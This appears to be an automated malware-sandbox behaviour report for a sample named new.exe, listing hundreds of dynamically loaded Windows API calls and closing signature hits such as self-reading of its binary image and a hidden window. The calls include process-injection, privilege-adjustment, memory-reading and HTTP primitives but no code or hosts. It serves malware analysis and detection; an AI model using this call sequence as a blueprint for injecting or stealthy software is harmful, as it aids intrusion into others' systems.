DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/GetModuleFileName
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: rasapi32.dll/RasEnumConnections
DynamicLoader: rasapi32.dll/RasEnumConnectionsW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: rtutils.dll/TraceRegisterExA
DynamicLoader: rtutils.dll/TracePrintfExA
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: WS2_32.dll/WSAStartup
DynamicLoader: WS2_32.dll/WSASocket
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/setsockopt
DynamicLoader: WS2_32.dll/WSAEventSelect
DynamicLoader: WS2_32.dll/ioctlsocket
DynamicLoader: WS2_32.dll/closesocket
DynamicLoader: kernel32.dll/GetComputerName
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptor
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/CreateFileMapping
DynamicLoader: kernel32.dll/CreateFileMappingW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid
DynamicLoader: ADVAPI32.dll/CreateWellKnownSidW
DynamicLoader: kernel32.dll/CreateMutex
DynamicLoader: kernel32.dll/CreateMutexW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/OpenMutex
DynamicLoader: kernel32.dll/OpenMutexW
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: kernel32.dll/GetProcessTimes
DynamicLoader: kernel32.dll/GetProcessTimesW
DynamicLoader: WS2_32.dll/ioctlsocket
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: kernel32.dll/FormatMessage
DynamicLoader: kernel32.dll/FormatMessageW
DynamicLoader: WS2_32.dll/WSAEventSelect
DynamicLoader: rasapi32.dll/RasConnectionNotification
DynamicLoader: rasapi32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: ADVAPI32.dll/RegOpenCurrentUser
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegNotifyChangeKeyValue
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: winhttp.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: winhttp.dll/WinHttpDetectAutoProxyConfigUrl
DynamicLoader: kernel32.dll/GlobalFree
DynamicLoader: WS2_32.dll/getaddrinfo
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/inet_addr
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: WS2_32.dll/WSAConnect
DynamicLoader: WS2_32.dll/send
DynamicLoader: WS2_32.dll/setsockopt
DynamicLoader: WS2_32.dll/recv
DynamicLoader: kernel32.dll/GetTempPath
DynamicLoader: kernel32.dll/GetTempPathW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/CreateProcess
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/DeleteFile
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/VirtualAllocEx
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ntdll.dll/NtOpenProcess
DynamicLoader: ntdll.dll/NtQueryInformationToken
DynamicLoader: ntdll.dll/_wcsupr
DynamicLoader: ntdll.dll/wcstombs
DynamicLoader: ntdll.dll/RtlCreateUserThread
DynamicLoader: ntdll.dll/__C_specific_handler
DynamicLoader: ntdll.dll/NtQueryVirtualMemory
DynamicLoader: ntdll.dll/RtlCompareMemory
DynamicLoader: ntdll.dll/NtOpenProcessToken
DynamicLoader: ntdll.dll/CsrGetProcessId
DynamicLoader: ntdll.dll/RtlComputeCrc32
DynamicLoader: ntdll.dll/RtlAllocateHeap
DynamicLoader: ntdll.dll/NtReadVirtualMemory
DynamicLoader: ntdll.dll/RtlAdjustPrivilege
DynamicLoader: ntdll.dll/NtClose
DynamicLoader: ntdll.dll/RtlFreeHeap
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/RtlDestroyHeap
DynamicLoader: ntdll.dll/memcmp
DynamicLoader: WININET.dll/HttpSendRequestA
DynamicLoader: WININET.dll/HttpOpenRequestA
DynamicLoader: WININET.dll/InternetSetOptionA
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetConnectA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/MoveFileExW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAllocEx
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetFileSizeEx
DynamicLoader: kernel32.dll/GetTempPathW
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateMutexW
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CreateWaitableTimerW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/FlushInstructionCache
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/GetVolumeInformationA
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/QueryPerformanceCounter
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetShellWindow
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/EqualSid
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextW
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: VERSION.dll/VerQueryValueA
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToCurrentRuntime_RetAddr
DynamicLoader: mscoreei.dll/CorBindToCurrentRuntime
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: alink.dll/CreateALink
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/StrongNameTokenFromPublicKey
DynamicLoader: mscoreei.dll/StrongNameTokenFromPublicKey_RetAddr
DynamicLoader: mscoreei.dll/StrongNameTokenFromPublicKey
DynamicLoader: mscoree.dll/StrongNameFreeBuffer
DynamicLoader: mscoreei.dll/StrongNameFreeBuffer_RetAddr
DynamicLoader: mscoreei.dll/StrongNameFreeBuffer
DynamicLoader: mscorwks.dll/StrongNameErrorInfo
DynamicLoader: mscorwks.dll/StrongNameTokenFromPublicKey
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscorwks.dll/StrongNameFreeBuffer
DynamicLoader: mscoree.dll/GetRealProcAddress
DynamicLoader: mscoreei.dll/GetRealProcAddress_RetAddr
DynamicLoader: mscoreei.dll/GetRealProcAddress
DynamicLoader: mscorwks.dll/CreateAssemblyNameObject
DynamicLoader: mscorwks.dll/CompareAssemblyIdentity
DynamicLoader: mscoree.dll/LoadLibraryShim
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: mscorpe.dll/CreateICeeFileGen
DynamicLoader: mscorpe.dll/DestroyICeeFileGen
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: diasymreader.dll/DllGetClassObject
DynamicLoader: RPCRT4.dll/UuidCreate
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: mscoreei.dll/GetCORRequiredVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORRequiredVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/DllCanUnloadNow_RetAddr
DynamicLoader: mscoreei.dll/DllCanUnloadNow
DynamicLoader: mscorpe.dll/DllCanUnloadNowInternal
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
At least one IP Address, Domain, or File Name was found in a crypto call
ioc: kernel32.dll
Reads data out of its own binary image
self_read: process: new.exe, pid: 1332, offset: 0x00000000, length: 0x00014800
self_read: process: new.exe, pid: 1332, offset: 0x0001461c, length: 0x000007e0
self_read: process: new.exe, pid: 1332, offset: 0x00016018, length: 0x0000fa4a
A process created a hidden window
Process: new.exe -> C:\Users\user\AppData\Local\Temp\new.exe
